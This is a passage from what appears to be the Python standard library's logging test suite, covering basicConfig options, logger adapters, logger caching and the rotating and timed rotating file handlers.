runner.run(make_record(self.assertIsNone))
finally:
asyncio.set_event_loop_policy(None)
@support.requires_working_socket()
def test_taskName_without_asyncio_imported(self):
try:
make_record = self._make_record_async
with asyncio.Runner() as runner, support.swap_item(sys.modules, 'asyncio', None):
logging.logAsyncioTasks = True
runner.run(make_record(self.assertIsNone))
logging.logAsyncioTasks = False
runner.run(make_record(self.assertIsNone))
finally:
asyncio.set_event_loop_policy(None)
class BasicConfigTest(unittest.TestCase):
"""Test suite for logging.basicConfig."""
def setUp(self):
super(BasicConfigTest, self).setUp()
self.handlers = logging.root.handlers
self.saved_handlers = logging._handlers.copy()
self.saved_handler_list = logging._handlerList[:]
self.original_logging_level = logging.root.level
self.addCleanup(self.cleanup)
logging.root.handlers = []
def tearDown(self):
for h in logging.root.handlers[:]:
logging.root.removeHandler(h)
h.close()
super(BasicConfigTest, self).tearDown()
def cleanup(self):
setattr(logging.root, 'handlers', self.handlers)
logging._handlers.clear()
logging._handlers.update(self.saved_handlers)
logging._handlerList[:] = self.saved_handler_list
logging.root.setLevel(self.original_logging_level)
def test_no_kwargs(self):
logging.basicConfig()
# handler defaults to a StreamHandler to sys.stderr
self.assertEqual(len(logging.root.handlers), 1)
handler = logging.root.handlers[0]
self.assertIsInstance(handler, logging.StreamHandler)
self.assertEqual(handler.stream, sys.stderr)
formatter = handler.formatter
# format defaults to logging.BASIC_FORMAT
self.assertEqual(formatter._style._fmt, logging.BASIC_FORMAT)
# datefmt defaults to None
self.assertIsNone(formatter.datefmt)
# style defaults to %
self.assertIsInstance(formatter._style, logging.PercentStyle)
# level is not explicitly set
self.assertEqual(logging.root.level, self.original_logging_level)
def test_strformatstyle(self):
with support.captured_stdout() as output:
logging.basicConfig(stream=sys.stdout, style="{")
logging.error("Log an error")
sys.stdout.seek(0)
self.assertEqual(output.getvalue().strip(),
"ERROR:root:Log an error")
def test_stringtemplatestyle(self):
with support.captured_stdout() as output:
logging.basicConfig(stream=sys.stdout, style="$")
logging.error("Log an error")
sys.stdout.seek(0)
self.assertEqual(output.getvalue().strip(),
"ERROR:root:Log an error")
def test_filename(self):
def cleanup(h1, h2, fn):
h1.close()
h2.close()
os.remove(fn)
logging.basicConfig(filename='test.log', encoding='utf-8')
self.assertEqual(len(logging.root.handlers), 1)
handler = logging.root.handlers[0]
self.assertIsInstance(handler, logging.FileHandler)
expected = logging.FileHandler('test.log', 'a', encoding='utf-8')
self.assertEqual(handler.stream.mode, expected.stream.mode)
self.assertEqual(handler.stream.name, expected.stream.name)
self.addCleanup(cleanup, handler, expected, 'test.log')
def test_filemode(self):
def cleanup(h1, h2, fn):
h1.close()
h2.close()
os.remove(fn)
logging.basicConfig(filename='test.log', filemode='wb')
handler = logging.root.handlers[0]
expected = logging.FileHandler('test.log', 'wb')
self.assertEqual(handler.stream.mode, expected.stream.mode)
self.addCleanup(cleanup, handler, expected, 'test.log')
def test_stream(self):
stream = io.StringIO()
self.addCleanup(stream.close)
logging.basicConfig(stream=stream)
self.assertEqual(len(logging.root.handlers), 1)
handler = logging.root.handlers[0]
self.assertIsInstance(handler, logging.StreamHandler)
self.assertEqual(handler.stream, stream)
def test_format(self):
logging.basicConfig(format='%(asctime)s - %(message)s')
formatter = logging.root.handlers[0].formatter
self.assertEqual(formatter._style._fmt, '%(asctime)s - %(message)s')
def test_datefmt(self):
logging.basicConfig(datefmt='bar')
formatter = logging.root.handlers[0].formatter
self.assertEqual(formatter.datefmt, 'bar')
def test_style(self):
logging.basicConfig(style='$')
formatter = logging.root.handlers[0].formatter
self.assertIsInstance(formatter._style, logging.StringTemplateStyle)
def test_level(self):
old_level = logging.root.level
self.addCleanup(logging.root.setLevel, old_level)
logging.basicConfig(level=57)
self.assertEqual(logging.root.level, 57)
# Test that second call has no effect
logging.basicConfig(level=58)
self.assertEqual(logging.root.level, 57)
def test_incompatible(self):
assertRaises = self.assertRaises
handlers = [logging.StreamHandler()]
stream = sys.stderr
assertRaises(ValueError, logging.basicConfig, filename='test.log',
stream=stream)
assertRaises(ValueError, logging.basicConfig, filename='test.log',
handlers=handlers)
assertRaises(ValueError, logging.basicConfig, stream=stream,
handlers=handlers)
# Issue 23207: test for invalid kwargs
assertRaises(ValueError, logging.basicConfig, loglevel=logging.INFO)
# Should pop both filename and filemode even if filename is None
logging.basicConfig(filename=None, filemode='a')
def test_handlers(self):
handlers = [
logging.StreamHandler(),
logging.StreamHandler(sys.stdout),
logging.StreamHandler(),
]
f = logging.Formatter()
handlers[2].setFormatter(f)
logging.basicConfig(handlers=handlers)
self.assertIs(handlers[0], logging.root.handlers[0])
self.assertIs(handlers[1], logging.root.handlers[1])
self.assertIs(handlers[2], logging.root.handlers[2])
self.assertIsNotNone(handlers[0].formatter)
self.assertIsNotNone(handlers[1].formatter)
self.assertIs(handlers[2].formatter, f)
self.assertIs(handlers[0].formatter, handlers[1].formatter)
def test_force(self):
old_string_io = io.StringIO()
new_string_io = io.StringIO()
old_handlers = [logging.StreamHandler(old_string_io)]
new_handlers = [logging.StreamHandler(new_string_io)]
logging.basicConfig(level=logging.WARNING, handlers=old_handlers)
logging.warning('warn')
logging.info('info')
logging.debug('debug')
self.assertEqual(len(logging.root.handlers), 1)
logging.basicConfig(level=logging.INFO, handlers=new_handlers,
force=True)
logging.warning('warn')
logging.info('info')
logging.debug('debug')
self.assertEqual(len(logging.root.handlers), 1)
self.assertEqual(old_string_io.getvalue().strip(),
'WARNING:root:warn')
self.assertEqual(new_string_io.getvalue().strip(),
'WARNING:root:warn\nINFO:root:info')
def test_encoding(self):
try:
encoding = 'utf-8'
logging.basicConfig(filename='test.log', encoding=encoding,
errors='strict',
format='%(message)s', level=logging.DEBUG)
self.assertEqual(len(logging.root.handlers), 1)
handler = logging.root.handlers[0]
self.assertIsInstance(handler, logging.FileHandler)
self.assertEqual(handler.encoding, encoding)
logging.debug('The Øresund Bridge joins Copenhagen to Malmö')
finally:
handler.close()
with open('test.log', encoding='utf-8') as f:
data = f.read().strip()
os.remove('test.log')
self.assertEqual(data,
'The Øresund Bridge joins Copenhagen to Malmö')
def test_encoding_errors(self):
try:
encoding = 'ascii'
logging.basicConfig(filename='test.log', encoding=encoding,
errors='ignore',
format='%(message)s', level=logging.DEBUG)
self.assertEqual(len(logging.root.handlers), 1)
handler = logging.root.handlers[0]
self.assertIsInstance(handler, logging.FileHandler)
self.assertEqual(handler.encoding, encoding)
logging.debug('The Øresund Bridge joins Copenhagen to Malmö')
finally:
handler.close()
with open('test.log', encoding='utf-8') as f:
data = f.read().strip()
os.remove('test.log')
self.assertEqual(data, 'The resund Bridge joins Copenhagen to Malm')
def test_encoding_errors_default(self):
try:
encoding = 'ascii'
logging.basicConfig(filename='test.log', encoding=encoding,
format='%(message)s', level=logging.DEBUG)
self.assertEqual(len(logging.root.handlers), 1)
handler = logging.root.handlers[0]
self.assertIsInstance(handler, logging.FileHandler)
self.assertEqual(handler.encoding, encoding)
self.assertEqual(handler.errors, 'backslashreplace')
logging.debug('😂: ☃️: The Øresund Bridge joins Copenhagen to Malmö')
finally:
handler.close()
with open('test.log', encoding='utf-8') as f:
data = f.read().strip()
os.remove('test.log')
self.assertEqual(data, r'\U0001f602: \u2603\ufe0f: The \xd8resund '
r'Bridge joins Copenhagen to Malm\xf6')
def test_encoding_errors_none(self):
# Specifying None should behave as 'strict'
try:
encoding = 'ascii'
logging.basicConfig(filename='test.log', encoding=encoding,
errors=None,
format='%(message)s', level=logging.DEBUG)
self.assertEqual(len(logging.root.handlers), 1)
handler = logging.root.handlers[0]
self.assertIsInstance(handler, logging.FileHandler)
self.assertEqual(handler.encoding, encoding)
self.assertIsNone(handler.errors)
message = []
def dummy_handle_error(record):
_, v, _ = sys.exc_info()
message.append(str(v))
handler.handleError = dummy_handle_error
logging.debug('The Øresund Bridge joins Copenhagen to Malmö')
self.assertTrue(message)
self.assertIn("'ascii' codec can't encode "
"character '\\xd8' in position 4:", message[0])
finally:
handler.close()
with open('test.log', encoding='utf-8') as f:
data = f.read().strip()
os.remove('test.log')
# didn't write anything due to the encoding error
self.assertEqual(data, r'')
@support.requires_working_socket()
def test_log_taskName(self):
async def log_record():
logging.warning('hello world')
handler = None
log_filename = make_temp_file('.log', 'test-logging-taskname-')
self.addCleanup(os.remove, log_filename)
try:
encoding = 'utf-8'
logging.basicConfig(filename=log_filename, errors='strict',
encoding=encoding, level=logging.WARNING,
format='%(taskName)s - %(message)s')
self.assertEqual(len(logging.root.handlers), 1)
handler = logging.root.handlers[0]
self.assertIsInstance(handler, logging.FileHandler)
with asyncio.Runner(debug=True) as runner:
logging.logAsyncioTasks = True
runner.run(log_record())
with open(log_filename, encoding='utf-8') as f:
data = f.read().strip()
self.assertRegex(data, r'Task-\d+ - hello world')
finally:
asyncio.set_event_loop_policy(None)
if handler:
handler.close()
def _test_log(self, method, level=None):
# logging.root has no handlers so basicConfig should be called
called = []
old_basic_config = logging.basicConfig
def my_basic_config(*a, **kw):
old_basic_config()
old_level = logging.root.level
logging.root.setLevel(100) # avoid having messages in stderr
self.addCleanup(logging.root.setLevel, old_level)
called.append((a, kw))
support.patch(self, logging, 'basicConfig', my_basic_config)
log_method = getattr(logging, method)
if level is not None:
log_method(level, "test me")
else:
log_method("test me")
# basicConfig was called with no arguments
self.assertEqual(called, [((), {})])
def test_log(self):
self._test_log('log', logging.WARNING)
def test_debug(self):
self._test_log('debug')
def test_info(self):
self._test_log('info')
def test_warning(self):
self._test_log('warning')
def test_error(self):
self._test_log('error')
def test_critical(self):
self._test_log('critical')
class LoggerAdapterTest(unittest.TestCase):
def setUp(self):
super(LoggerAdapterTest, self).setUp()
old_handler_list = logging._handlerList[:]
self.recording = RecordingHandler()
self.logger = logging.root
self.logger.addHandler(self.recording)
self.addCleanup(self.logger.removeHandler, self.recording)
self.addCleanup(self.recording.close)
def cleanup():
logging._handlerList[:] = old_handler_list
self.addCleanup(cleanup)
self.addCleanup(logging.shutdown)
self.adapter = logging.LoggerAdapter(logger=self.logger, extra=None)
def test_exception(self):
msg = 'testing exception: %r'
exc = None
try:
1 / 0
except ZeroDivisionError as e:
exc = e
self.adapter.exception(msg, self.recording)
self.assertEqual(len(self.recording.records), 1)
record = self.recording.records[0]
self.assertEqual(record.levelno, logging.ERROR)
self.assertEqual(record.msg, msg)
self.assertEqual(record.args, (self.recording,))
self.assertEqual(record.exc_info,
(exc.__class__, exc, exc.__traceback__))
def test_exception_excinfo(self):
try:
1 / 0
except ZeroDivisionError as e:
exc = e
self.adapter.exception('exc_info test', exc_info=exc)
self.assertEqual(len(self.recording.records), 1)
record = self.recording.records[0]
self.assertEqual(record.exc_info,
(exc.__class__, exc, exc.__traceback__))
def test_critical(self):
msg = 'critical test! %r'
self.adapter.critical(msg, self.recording)
self.assertEqual(len(self.recording.records), 1)
record = self.recording.records[0]
self.assertEqual(record.levelno, logging.CRITICAL)
self.assertEqual(record.msg, msg)
self.assertEqual(record.args, (self.recording,))
def test_is_enabled_for(self):
old_disable = self.adapter.logger.manager.disable
self.adapter.logger.manager.disable = 33
self.addCleanup(setattr, self.adapter.logger.manager, 'disable',
old_disable)
self.assertFalse(self.adapter.isEnabledFor(32))
def test_has_handlers(self):
self.assertTrue(self.adapter.hasHandlers())
for handler in self.logger.handlers:
self.logger.removeHandler(handler)
self.assertFalse(self.logger.hasHandlers())
self.assertFalse(self.adapter.hasHandlers())
def test_nested(self):
class Adapter(logging.LoggerAdapter):
prefix = 'Adapter'
def process(self, msg, kwargs):
return f"{self.prefix} {msg}", kwargs
msg = 'Adapters can be nested, yo.'
adapter = Adapter(logger=self.logger, extra=None)
adapter_adapter = Adapter(logger=adapter, extra=None)
adapter_adapter.prefix = 'AdapterAdapter'
self.assertEqual(repr(adapter), repr(adapter_adapter))
adapter_adapter.log(logging.CRITICAL, msg, self.recording)
self.assertEqual(len(self.recording.records), 1)
record = self.recording.records[0]
self.assertEqual(record.levelno, logging.CRITICAL)
self.assertEqual(record.msg, f"Adapter AdapterAdapter {msg}")
self.assertEqual(record.args, (self.recording,))
orig_manager = adapter_adapter.manager
self.assertIs(adapter.manager, orig_manager)
self.assertIs(self.logger.manager, orig_manager)
temp_manager = object()
try:
adapter_adapter.manager = temp_manager
self.assertIs(adapter_adapter.manager, temp_manager)
self.assertIs(adapter.manager, temp_manager)
self.assertIs(self.logger.manager, temp_manager)
finally:
adapter_adapter.manager = orig_manager
self.assertIs(adapter_adapter.manager, orig_manager)
self.assertIs(adapter.manager, orig_manager)
self.assertIs(self.logger.manager, orig_manager)
class LoggerTest(BaseTest, AssertErrorMessage):
def setUp(self):
super(LoggerTest, self).setUp()
self.recording = RecordingHandler()
self.logger = logging.Logger(name='blah')
self.logger.addHandler(self.recording)
self.addCleanup(self.logger.removeHandler, self.recording)
self.addCleanup(self.recording.close)
self.addCleanup(logging.shutdown)
def test_set_invalid_level(self):
self.assert_error_message(
TypeError, 'Level not an integer or a valid string: None',
self.logger.setLevel, None)
self.assert_error_message(
TypeError, 'Level not an integer or a valid string: (0, 0)',
self.logger.setLevel, (0, 0))
def test_exception(self):
msg = 'testing exception: %r'
exc = None
try:
1 / 0
except ZeroDivisionError as e:
exc = e
self.logger.exception(msg, self.recording)
self.assertEqual(len(self.recording.records), 1)
record = self.recording.records[0]
self.assertEqual(record.levelno, logging.ERROR)
self.assertEqual(record.msg, msg)
self.assertEqual(record.args, (self.recording,))
self.assertEqual(record.exc_info,
(exc.__class__, exc, exc.__traceback__))
def test_log_invalid_level_with_raise(self):
with support.swap_attr(logging, 'raiseExceptions', True):
self.assertRaises(TypeError, self.logger.log, '10', 'test message')
def test_log_invalid_level_no_raise(self):
with support.swap_attr(logging, 'raiseExceptions', False):
self.logger.log('10', 'test message') # no exception happens
def test_find_caller_with_stack_info(self):
called = []
support.patch(self, logging.traceback, 'print_stack',
lambda f, file: called.append(file.getvalue()))
self.logger.findCaller(stack_info=True)
self.assertEqual(len(called), 1)
self.assertEqual('Stack (most recent call last):\n', called[0])
def test_find_caller_with_stacklevel(self):
the_level = 1
trigger = self.logger.warning
def innermost():
trigger('test', stacklevel=the_level)
def inner():
innermost()
def outer():
inner()
records = self.recording.records
outer()
self.assertEqual(records[-1].funcName, 'innermost')
lineno = records[-1].lineno
the_level += 1
outer()
self.assertEqual(records[-1].funcName, 'inner')
self.assertGreater(records[-1].lineno, lineno)
lineno = records[-1].lineno
the_level += 1
outer()
self.assertEqual(records[-1].funcName, 'outer')
self.assertGreater(records[-1].lineno, lineno)
lineno = records[-1].lineno
root_logger = logging.getLogger()
root_logger.addHandler(self.recording)
trigger = logging.warning
outer()
self.assertEqual(records[-1].funcName, 'outer')
root_logger.removeHandler(self.recording)
trigger = self.logger.warning
the_level += 1
outer()
self.assertEqual(records[-1].funcName, 'test_find_caller_with_stacklevel')
self.assertGreater(records[-1].lineno, lineno)
def test_make_record_with_extra_overwrite(self):
name = 'my record'
level = 13
fn = lno = msg = args = exc_info = func = sinfo = None
rv = logging._logRecordFactory(name, level, fn, lno, msg, args,
exc_info, func, sinfo)
for key in ('message', 'asctime') + tuple(rv.__dict__.keys()):
extra = {key: 'some value'}
self.assertRaises(KeyError, self.logger.makeRecord, name, level,
fn, lno, msg, args, exc_info,
extra=extra, sinfo=sinfo)
def test_make_record_with_extra_no_overwrite(self):
name = 'my record'
level = 13
fn = lno = msg = args = exc_info = func = sinfo = None
extra = {'valid_key': 'some value'}
result = self.logger.makeRecord(name, level, fn, lno, msg, args,
exc_info, extra=extra, sinfo=sinfo)
self.assertIn('valid_key', result.__dict__)
def test_has_handlers(self):
self.assertTrue(self.logger.hasHandlers())
for handler in self.logger.handlers:
self.logger.removeHandler(handler)
self.assertFalse(self.logger.hasHandlers())
def test_has_handlers_no_propagate(self):
child_logger = logging.getLogger('blah.child')
child_logger.propagate = False
self.assertFalse(child_logger.hasHandlers())
def test_is_enabled_for(self):
old_disable = self.logger.manager.disable
self.logger.manager.disable = 23
self.addCleanup(setattr, self.logger.manager, 'disable', old_disable)
self.assertFalse(self.logger.isEnabledFor(22))
def test_is_enabled_for_disabled_logger(self):
old_disabled = self.logger.disabled
old_disable = self.logger.manager.disable
self.logger.disabled = True
self.logger.manager.disable = 21
self.addCleanup(setattr, self.logger, 'disabled', old_disabled)
self.addCleanup(setattr, self.logger.manager, 'disable', old_disable)
self.assertFalse(self.logger.isEnabledFor(22))
def test_root_logger_aliases(self):
root = logging.getLogger()
self.assertIs(root, logging.root)
self.assertIs(root, logging.getLogger(None))
self.assertIs(root, logging.getLogger(''))
self.assertIs(root, logging.getLogger('root'))
self.assertIs(root, logging.getLogger('foo').root)
self.assertIs(root, logging.getLogger('foo.bar').root)
self.assertIs(root, logging.getLogger('foo').parent)
self.assertIsNot(root, logging.getLogger('\0'))
self.assertIsNot(root, logging.getLogger('foo.bar').parent)
def test_invalid_names(self):
self.assertRaises(TypeError, logging.getLogger, any)
self.assertRaises(TypeError, logging.getLogger, b'foo')
def test_pickling(self):
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
for name in ('', 'root', 'foo', 'foo.bar', 'baz.bar'):
logger = logging.getLogger(name)
s = pickle.dumps(logger, proto)
unpickled = pickle.loads(s)
self.assertIs(unpickled, logger)
def test_caching(self):
root = self.root_logger
logger1 = logging.getLogger("abc")
logger2 = logging.getLogger("abc.def")
# Set root logger level and ensure cache is empty
root.setLevel(logging.ERROR)
self.assertEqual(logger2.getEffectiveLevel(), logging.ERROR)
self.assertEqual(logger2._cache, {})
# Ensure cache is populated and calls are consistent
self.assertTrue(logger2.isEnabledFor(logging.ERROR))
self.assertFalse(logger2.isEnabledFor(logging.DEBUG))
self.assertEqual(logger2._cache, {logging.ERROR: True, logging.DEBUG: False})
self.assertEqual(root._cache, {})
self.assertTrue(logger2.isEnabledFor(logging.ERROR))
# Ensure root cache gets populated
self.assertEqual(root._cache, {})
self.assertTrue(root.isEnabledFor(logging.ERROR))
self.assertEqual(root._cache, {logging.ERROR: True})
# Set parent logger level and ensure caches are emptied
logger1.setLevel(logging.CRITICAL)
self.assertEqual(logger2.getEffectiveLevel(), logging.CRITICAL)
self.assertEqual(logger2._cache, {})
# Ensure logger2 uses parent logger's effective level
self.assertFalse(logger2.isEnabledFor(logging.ERROR))
# Set level to NOTSET and ensure caches are empty
logger2.setLevel(logging.NOTSET)
self.assertEqual(logger2.getEffectiveLevel(), logging.CRITICAL)
self.assertEqual(logger2._cache, {})
self.assertEqual(logger1._cache, {})
self.assertEqual(root._cache, {})
# Verify logger2 follows parent and not root
self.assertFalse(logger2.isEnabledFor(logging.ERROR))
self.assertTrue(logger2.isEnabledFor(logging.CRITICAL))
self.assertFalse(logger1.isEnabledFor(logging.ERROR))
self.assertTrue(logger1.isEnabledFor(logging.CRITICAL))
self.assertTrue(root.isEnabledFor(logging.ERROR))
# Disable logging in manager and ensure caches are clear
logging.disable()
self.assertEqual(logger2.getEffectiveLevel(), logging.CRITICAL)
self.assertEqual(logger2._cache, {})
self.assertEqual(logger1._cache, {})
self.assertEqual(root._cache, {})
# Ensure no loggers are enabled
self.assertFalse(logger1.isEnabledFor(logging.CRITICAL))
self.assertFalse(logger2.isEnabledFor(logging.CRITICAL))
self.assertFalse(root.isEnabledFor(logging.CRITICAL))
class BaseFileTest(BaseTest):
"Base class for handler tests that write log files"
def setUp(self):
BaseTest.setUp(self)
self.fn = make_temp_file(".log", "test_logging-2-")
self.rmfiles = []
def tearDown(self):
for fn in self.rmfiles:
os.unlink(fn)
if os.path.exists(self.fn):
os.unlink(self.fn)
BaseTest.tearDown(self)
def assertLogFile(self, filename):
"Assert a log file is there and register it for deletion"
self.assertTrue(os.path.exists(filename),
msg="Log file %r does not exist" % filename)
self.rmfiles.append(filename)
def next_rec(self):
return logging.LogRecord('n', logging.DEBUG, 'p', 1,
self.next_message(), None, None, None)
class FileHandlerTest(BaseFileTest):
def test_delay(self):
os.unlink(self.fn)
fh = logging.FileHandler(self.fn, encoding='utf-8', delay=True)
self.assertIsNone(fh.stream)
self.assertFalse(os.path.exists(self.fn))
fh.handle(logging.makeLogRecord({}))
self.assertIsNotNone(fh.stream)
self.assertTrue(os.path.exists(self.fn))
fh.close()
def test_emit_after_closing_in_write_mode(self):
# Issue #42378
os.unlink(self.fn)
fh = logging.FileHandler(self.fn, encoding='utf-8', mode='w')
fh.setFormatter(logging.Formatter('%(message)s'))
fh.emit(self.next_rec()) # '1'
fh.close()
fh.emit(self.next_rec()) # '2'
with open(self.fn) as fp:
self.assertEqual(fp.read().strip(), '1')
class RotatingFileHandlerTest(BaseFileTest):
@unittest.skipIf(support.is_wasi, "WASI does not have /dev/null.")
def test_should_not_rollover(self):
# If maxbytes is zero rollover never occurs
rh = logging.handlers.RotatingFileHandler(
self.fn, encoding="utf-8", maxBytes=0)
self.assertFalse(rh.shouldRollover(None))
rh.close()
# bpo-45401 - test with special file
# We set maxBytes to 1 so that rollover would normally happen, except
# for the check for regular files
rh = logging.handlers.RotatingFileHandler(
os.devnull, encoding="utf-8", maxBytes=1)
self.assertFalse(rh.shouldRollover(self.next_rec()))
rh.close()
def test_should_rollover(self):
rh = logging.handlers.RotatingFileHandler(self.fn, encoding="utf-8", maxBytes=1)
self.assertTrue(rh.shouldRollover(self.next_rec()))
rh.close()
def test_file_created(self):
# checks that the file is created and assumes it was created
# by us
rh = logging.handlers.RotatingFileHandler(self.fn, encoding="utf-8")
rh.emit(self.next_rec())
self.assertLogFile(self.fn)
rh.close()
def test_rollover_filenames(self):
def namer(name):
return name + ".test"
rh = logging.handlers.RotatingFileHandler(
self.fn, encoding="utf-8", backupCount=2, maxBytes=1)
rh.namer = namer
rh.emit(self.next_rec())
self.assertLogFile(self.fn)
rh.emit(self.next_rec())
self.assertLogFile(namer(self.fn + ".1"))
rh.emit(self.next_rec())
self.assertLogFile(namer(self.fn + ".2"))
self.assertFalse(os.path.exists(namer(self.fn + ".3")))
rh.close()
def test_namer_rotator_inheritance(self):
class HandlerWithNamerAndRotator(logging.handlers.RotatingFileHandler):
def namer(self, name):
return name + ".test"
def rotator(self, source, dest):
if os.path.exists(source):
os.replace(source, dest + ".rotated")
rh = HandlerWithNamerAndRotator(
self.fn, encoding="utf-8", backupCount=2, maxBytes=1)
self.assertEqual(rh.namer(self.fn), self.fn + ".test")
rh.emit(self.next_rec())
self.assertLogFile(self.fn)
rh.emit(self.next_rec())
self.assertLogFile(rh.namer(self.fn + ".1") + ".rotated")
self.assertFalse(os.path.exists(rh.namer(self.fn + ".1")))
rh.close()
@support.requires_zlib()
def test_rotator(self):
def namer(name):
return name + ".gz"
def rotator(source, dest):
with open(source, "rb") as sf:
data = sf.read()
compressed = zlib.compress(data, 9)
with open(dest, "wb") as df:
df.write(compressed)
os.remove(source)
rh = logging.handlers.RotatingFileHandler(
self.fn, encoding="utf-8", backupCount=2, maxBytes=1)
rh.rotator = rotator
rh.namer = namer
m1 = self.next_rec()
rh.emit(m1)
self.assertLogFile(self.fn)
m2 = self.next_rec()
rh.emit(m2)
fn = namer(self.fn + ".1")
self.assertLogFile(fn)
newline = os.linesep
with open(fn, "rb") as f:
compressed = f.read()
data = zlib.decompress(compressed)
self.assertEqual(data.decode("ascii"), m1.msg + newline)
rh.emit(self.next_rec())
fn = namer(self.fn + ".2")
self.assertLogFile(fn)
with open(fn, "rb") as f:
compressed = f.read()
data = zlib.decompress(compressed)
self.assertEqual(data.decode("ascii"), m1.msg + newline)
rh.emit(self.next_rec())
fn = namer(self.fn + ".2")
with open(fn, "rb") as f:
compressed = f.read()
data = zlib.decompress(compressed)
self.assertEqual(data.decode("ascii"), m2.msg + newline)
self.assertFalse(os.path.exists(namer(self.fn + ".3")))
rh.close()
class TimedRotatingFileHandlerTest(BaseFileTest):
@unittest.skipIf(support.is_wasi, "WASI does not have /dev/null.")
def test_should_not_rollover(self):
# See bpo-45401. Should only ever rollover regular files
fh = logging.handlers.TimedRotatingFileHandler(
os.devnull, 'S', encoding="utf-8", backupCount=1)
time.sleep(1.1) # a little over a second ...
r = logging.makeLogRecord({'msg': 'testing - device file'})
self.assertFalse(fh.shouldRollover(r))
fh.close()
# other test methods added below
def test_rollover(self):
fh = logging.handlers.TimedRotatingFileHandler(
self.fn, 'S', encoding="utf-8", backupCount=1)
fmt = logging.Formatter('%(asctime)s %(message)s')
fh.setFormatter(fmt)
r1 = logging.makeLogRecord({'msg': 'testing - initial'})
fh.emit(r1)
self.assertLogFile(self.fn)
time.sleep(1.1) # a little over a second ...
r2 = logging.makeLogRecord({'msg': 'testing - after delay'})
fh.emit(r2)
fh.close()
# At this point, we should have a recent rotated file which we
# can test for the existence of. However, in practice, on some
# machines which run really slowly, we don't know how far back
# in time to go to look for the log file. So, we go back a fair
# bit, and stop as soon as we see a rotated file. In theory this
# could of course still fail, but the chances are lower.
found = False
now = datetime.datetime.now()
GO_BACK = 5 * 60 # seconds
for secs in range(GO_BACK):
prev = now - datetime.timedelta(seconds=secs)
fn = self.fn + prev.strftime(".%Y-%m-%d_%H-%M-%S")
found = os.path.exists(fn)
if found:
self.rmfiles.append(fn)
break
msg = 'No rotated files found, went back %d seconds' % GO_BACK
if not found:
# print additional diagnostics
dn, fn = os.path.split(self.fn)
files = [f for f in os.listdir(dn) if f.startswith(fn)]
print('Test time: %s' % now.strftime("%Y-%m-%d %H-%M-%S"), file=sys.stderr)
print('The only matching files are: %s' % files, file=sys.stderr)
for f in files:
print('Contents of %s:' % f)
path = os.path.join(dn, f)
with open(path, 'r') as tf:
print(tf.read())
self.assertTrue(found, msg=msg)
def test_invalid(self):
assertRaises = self.assertRaises
assertRaises(ValueError, logging.handlers.TimedRotatingFileHandler,
self.fn, 'X', encoding="utf-8", delay=True)
assertRaises(ValueError, logging.handlers.TimedRotatingFileHandler,
self.fn, 'W', encoding="utf-8", delay=True)
assertRaises(ValueError, logging.handlers.TimedRotatingFileHandler,
self.fn, 'W7', encoding="utf-8", delay=True)
def test_compute_rollover_daily_attime(self):
currentTime = 0
atTime = datetime.time(12, 0, 0)
rh = logging.handlers.TimedRotatingFileHandler(
self.fn, encoding="utf-8", when='MIDNIGHT', interval=1, backupCount=0,
utc=True, atTime=atTime)
try:
actual = rh.computeRollover(currentTime)
self.assertEqual(actual, currentTime + 12 * 60 * 60)
actual = rh.computeRollover(currentTime + 13 * 60 * 60)
self.assertEqual(actual, currentTime + 36 * 60 * 60)
finally:
rh.close()
#@unittest.skipIf(True, 'Temporarily skipped while failures investigated.')
def test_compute_rollover_weekly_attime(self):
currentTime = int(time.time())
today = currentTime - currentTime % 86400
atTime = datetime.time(12, 0, 0)
wday = time.gmtime(today).tm_wday
for day in range(7):
rh = logging.handlers.TimedRotatingFileHandler(
self.fn, encoding="utf-8", when='W%d' % day, interval=1, backupCount=0,
utc=True, atTime=atTime)
try:
if wday > day:
# The rollover day has already passed this week, so we
# go over into next week
expected = (7 - wday + day)
else:
expected = (day - wday)
# At this point expected is in days from now, convert to seconds
expected *= 24 * 60 * 60
# Add in the rollover time
expected += 12 * 60 * 60
# Add in adjustment for today
expected += today
actual = rh.computeRollover(today)
if actual != expected:
print('failed in timezone: %d' % time.timezone)
print('local vars: %s' % locals())
self.assertEqual(actual, expected)
if day == wday:
# goes into following week
expected += 7 * 24 * 60 * 60
actual = rh.computeRollover(today + 13 * 60 * 60)
if actual != expected:
print('failed in timezone: %d' % time.timezone)
print('local vars: %s' % locals())
self.assertEqual(actual, expected)
finally:
rh.close()
def test_compute_files_to_delete(self):
# See bpo-46063 for background
wd = tempfile.mkdtemp(prefix='test_logging_')
self.addCleanup(shutil.rmtree, wd)
times = []
dt = datetime.datetime.now()
for i in range(10):
times.append(dt.strftime('%Y-%m-%d_%H-%M-%S'))
dt += datetime.timedelta(seconds=5)
prefixes = ('a.b', 'a.b.c', 'd.e', 'd.e.f')
files = []
rotators = []
for prefix in prefixes:
p = os.path.join(wd, '%s.log' % prefix)
rotator = logging.handlers.TimedRotatingFileHandler(p, when='s',
interval=5,
backupCount=7,
delay=True)
rotators.append(rotator)
if prefix.startswith('a.b'):
for t in times:
files.append('%s.log.%s' % (prefix, t))
else:
rotator.namer = lambda name: name.replace('.log', '') + '.log'
for t in times:
files.append('%s.%s.log' % (prefix, t))
# Create empty files
for fn in files:
p = os.path.join(wd, fn)
with open(p, 'wb') as f:
pass
# Now the checks that only the correct files are offered up for deletion
for i, prefix in enumerate(prefixes):
rotator = rotators[i]
candidates = rotator.getFilesToDelete()
self.assertEqual(len(candidates), 3)
if prefix.startswith('a.b'):
p = '%s.log.' % prefix
for c in candidates:
d, fn = os.path.split(c)
self.assertTrue(fn.startswith(p))
else:
for c in candidates:
d, fn = os.path.split(c)
self.assertTrue(fn.endswith('.log'))
self.assertTrue(fn.startswith(prefix + '.') and
fn[len(prefix) + 2].isdigit())
def secs(**kw):
return datetime.timedelta(**kw) // datetime.timedelta(seconds=1)
for when, exp in (('S', 1),
('M', 60),
('H', 60 * 60),
('D', 60 * 60 * 24),
('MIDNIGHT', 60 * 60 * 24),
# current time (epoch start) is a Thursday, W0 means Monday
('W0', secs(days=4, hours=24)),
):
def test_compute_rollover(self, when=when, exp=exp):
rh = logging.handlers.TimedRotatingFileHandler(
self.fn, encoding="utf-8", when=when, interval=1, backupCount=0, utc=True)
currentTime = 0.0
actual = rh.computeRollover(currentTime)
if exp != actual:
# Failures occur on some systems for MIDNIGHT and W0.
# Print detailed calculation for MIDNIGHT so we can try to see
# what's going on
if when == 'MIDNIGHT':
try:
if rh.utc:
t = time.gmtime(currentTime)
else:
t = time.localtime(currentTime)
currentHour = t[3]
currentMinute = t[4]
currentSecond = t[5]
# r is the number of seconds left between now and midnight
r = logging.handlers._MIDNIGHT - ((currentHour * 60 +
currentMinute) * 60 +
currentSecond)
